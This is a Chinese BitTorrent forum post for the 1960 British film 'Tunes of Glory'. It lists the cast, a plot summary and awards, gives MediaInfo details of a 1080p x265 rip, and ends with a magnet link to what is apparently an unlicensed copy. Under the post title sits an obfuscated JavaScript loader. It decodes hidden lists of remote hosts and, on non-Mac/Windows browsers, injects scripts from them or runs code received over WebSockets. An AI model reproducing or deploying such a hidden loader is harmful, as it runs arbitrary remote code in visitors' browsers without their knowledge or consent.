鼓笛震军魂[简繁字幕]Tunes.of.Glory.1960.Criterion.Collection.1080p.BluRay.x265.10bit.FLAC.MNHD-迅雷下载 8.73GB

版主小s 1月前 285

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 鼓笛震军魂 / 荣誉感 / 恩怨双雄
◎片  名 Tunes of Glory
◎年  代 1960
◎产  地 英国
◎类  别 剧情 / 爱情
◎语  言 英语
◎上映日期 1960-10-28
◎IMDb链接 https://www.imdb.com/title/tt0054412/
◎豆瓣评分 7.0/10 (174人评价)
◎豆瓣链接 https://movie.douban.com/subject/1302854/
◎片  长 107 分钟
◎导  演 罗纳德·尼姆 Ronald Neame (id:1044727)
◎编  剧 詹姆斯·肯纳韦 James Kennaway (id:1020016)
◎演  员 亚历克·吉尼斯 Alec Guinness (id:1000109)
       约翰·米尔斯 John Mills (id:1123075)
       丹尼斯·普莱斯 Dennis Price (id:1012579)
       凯·沃尔什 Kay Walsh (id:1050385)
       约翰·弗拉瑟 John Fraser (id:1032643)
       理查德·利奇 Richard Leech (id:1112477)
       安德鲁·克尔 Andrew Keir (id:1103652)
       邓肯·麦克雷 Duncan Macrae (id:1117068)
       杰拉尔德  哈波尔 Gerald Harper (id:1100882)
       威廉·马洛 William Marlowe (id:1117086)
       戈登·杰克逊 Gordon Jackson (id:1104979)
       皮特·麦克恩里 Peter McEnery (id:1118785)
       Angus Lennie Angus Lennie (id:1120852)
       Anne Leon Anne Leon (id:1126087)
       格温·尼尔森 Gwen Nelson (id:1133276)
       洛克伍德·韦斯特 Lockwood West (id:1162804)
       John Harvey John Harvey (id:1100166)
       Frazer Hines Frazer Hines (id:1098413)
       马克·伯恩斯 Mark Burns (id:1000772)
       苏珊娜·约克 Susannah York (id:1014097)
       Robert Arnold Robert Arnold (id:1058401)
       Keith Banks Keith Banks (id:1065059)
       詹姆斯·科普兰 James Copeland (id:1070052)
       艾伦·卡思伯森 Allan Cuthbertson (id:1075605)
       Keith Faulkner Keith Faulkner (id:1080895)
       Andrew Downie Andrew Downie (id:1080972)
       珀西·赫伯特 Percy Herbert (id:1094702)
       Paul Whitsun-Jones Paul Whitsun-Jones (id:1166735)
       Albert Fennell Albert Fennell (id:1002324)
       Colin Lesslie Colin Lesslie (id:1017559)
       马尔科姆·阿诺德 Malcolm Arnold (id:1028893)
       亚瑟·伊贝特森 Arthur Ibbetson (id:1051470)
       安妮·考特斯 Anne V. Coates (id:1037289)
       威尔弗雷德·欣格尔顿 Wilfred Shingleton (id:1008466)
       Colin M. Brewer Colin M. Brewer (id:1048906)

◎标  签 英国 / CC / 1960 / 英国电影 / 爱情 / AlecGuinness / 罗纳德·尼姆 / 1960s

◎简  介
  巴塞尔(约翰·米尔斯 John Mills 饰)是山地步兵团新任命的团长,这个严肃而又认真的男人刚刚上任就决定好好的整顿一下军队内懒散的恶习。在巴塞尔到来之前,步兵团的生活可谓是闲散而又惬意,克莱辛中校(亚利克·基尼斯 Alec Guinness 饰)的日子过得如鱼得水,但现在不同了,这让克莱辛感到非常的不满。虽然表面上,克莱辛对巴塞尔做出的种种决定都十分赞同,但在背地里,他不停的煽动着下级们对于巴塞尔的抱怨和不满。                                    
                                某日,克莱辛发现自己的下属竟然在背地里勾引自己的女儿,被愤怒冲昏了头脑的克莱辛狠狠的将这个不知天高地厚的小子胖揍了一顿。

◎获奖情况 (共3项)
  第33届奥斯卡金像奖 (1961)
  最佳改编剧本(提名)
   └──詹姆斯·肯纳韦 (id:1020016)

  第21届威尼斯电影节 (1960)
  主竞赛单元 金狮奖 (提名)
   └──罗纳德·尼姆 (id:1044727)
  沃尔皮杯 最佳男演员
   └──约翰·米尔斯 (id:1123075)

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 6133740981447227630645222776680988612 (0x49D50C76883207D3417FB48E407BFC4)
  4. Complete name                            : Tunes.of.Glory.19[email protected]BBQDDQ.COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 8.73 GiB
  8. Duration                                 : 1 h 47 min
  9. Overall bit rate mode                    : Variable
  10. Overall bit rate                         : 11.6 Mb/s
  11. Encoded date                             : UTC 2021-07-19 13:40:28
  12. Writing application                      : mkvmerge v45.0.0 ('Heaven in Pennies') 64-bit
  13. Writing library                          : libebml v1.3.10 + libmatroska v1.5.2
  14. Cover                                    : Yes
  15. Attachments                              : cover
  16. Video
  17. ID                                       : 1
  18. Format                                   : HEVC
  19. Format/Info                              : High Efficiency Video Coding
  20. Format profile                           : Main [email protected]@High
  21. Codec ID                                 : V_MPEGH/ISO/HEVC
  22. Duration                                 : 1 h 47 min
  23. Bit rate                                 : 11.0 Mb/s
  24. Width                                    : 1 792 pixels
  25. Height                                   : 1 080 pixels
  26. Display aspect ratio                     : 5:3
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 23.976 (24000/1001/53354) FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 10 bits
  32. Bits/(Pixel*Frame)                       : 0.237
  33. Stream size                              : 8.25 GiB (95%)
  34. Writing library                          : x265 0.0:[Linux][GCC 7.5.0][64 bit] 10bit
  35. Encoding settings                        : cpuid=533541111039 / frame-threads=5 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1792x1080 / interlace=0 / total-frames=154790 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=6 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=23 / keyint=250 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=80 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=23.5 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=2 / aq-strength=1.00 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0
  36. Default                                  : Yes
  37. Forced                                   : No
  38. Color range                              : Limited
  39. Color primaries                          : BT.709
  40. Transfer characteristics                 : BT.709
  41. Matrix coefficients                      : BT.709
  42. Audio
  43. ID                                       : 2
  44. Format                                   : FLAC
  45. Format/Info                              : Free Lossless Audio Codec
  46. Codec ID                                 : A_FLAC
  47. Duration                                 : 1 h 47 min
  48. Bit rate mode                            : Variable
  49. Bit rate                                 : 570 kb/s
  50. Channel(s)                               : 1 channel
  51. Channel layout                           : C
  52. Sampling rate                            : 48.0 kHz
  53. Frame rate                               : 10.417 FPS (4608 SPF)
  54. Bit depth                                : 24 bits
  55. Compression mode                         : Lossless
  56. Stream size                              : 438 MiB (5%)
  57. Writing library                          : Lavf58.45.100
  58. Language                                 : English
  59. Default                                  : Yes
  60. Forced                                   : No
  61. Text #1
  62. ID                                       : 3
  63. Format                                   : PGS
  64. Muxing mode                              : zlib
  65. Codec ID                                 : S_HDMV/PGS
  66. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  67. Duration                                 : 1 h 45 min
  68. Bit rate                                 : 66.6 kb/s
  69. Count of elements                        : 3358
  70. Stream size                              : 50.5 MiB (1%)
  71. Language                                 : English
  72. Default                                  : No
  73. Forced                                   : No
  74. Text #2
  75. ID                                       : 4
  76. Format                                   : PGS
  77. Muxing mode                              : zlib
  78. Codec ID                                 : S_HDMV/PGS
  79. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  80. Duration                                 : 1 h 44 min
  81. Bit rate                                 : 43.9 kb/s
  82. Count of elements                        : 2966
  83. Stream size                              : 32.9 MiB (0%)
  84. Title                                    : Simplified Chinese
  85. Language                                 : Chinese
  86. Default                                  : Yes
  87. Forced                                   : No
  88. Text #3
  89. ID                                       : 5
  90. Format                                   : PGS
  91. Muxing mode                              : zlib
  92. Codec ID                                 : S_HDMV/PGS
  93. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  94. Duration                                 : 1 h 44 min
  95. Bit rate                                 : 45.6 kb/s
  96. Count of elements                        : 2966
  97. Stream size                              : 34.2 MiB (0%)
  98. Title                                    : Traditional Chinese
  99. Language                                 : Chinese
  100. Default                                  : No
  101. Forced                                   : No
  102. Menu
  103. 00:00:00.000                             : en:Opening credits
  104. 00:02:48.918                             : en:Jock's last day
  105. 00:11:08.209                             : en:Colonel Barrow
  106. 00:15:25.841                             : en:Bad form
  107. 00:21:30.664                             : en:Breakfast with Morag
  108. 00:23:50.095                             : en:Inspection
  109. 00:32:08.009                             : en:"Some other time"
  110. 00:38:01.737                             : en:Mary
  111. 00:42:12.279                             : en:Dancing class
  112. 00:45:37.109                             : en:The party
  113. 00:55:27.157                             : en:Bar brawl
  114. 00:59:50.587                             : en:A formal inquiry
  115. 01:09:54.398                             : en:In the mess
  116. 01:14:50.277                             : en:"The idea"
  117. 01:24:18.011                             : en:"Jock's decision"
  118. 01:31:08.129                             : en:"The living and the dead"
  119. 01:35:17.962                             : en:Full honors
  120. 01:47:04.418                             : en:End credits
  121. 01:47:35.782                             : en:Color bars


TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:70777400CBDFCFBB84540DBD2168EDA1F5CA43C6
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖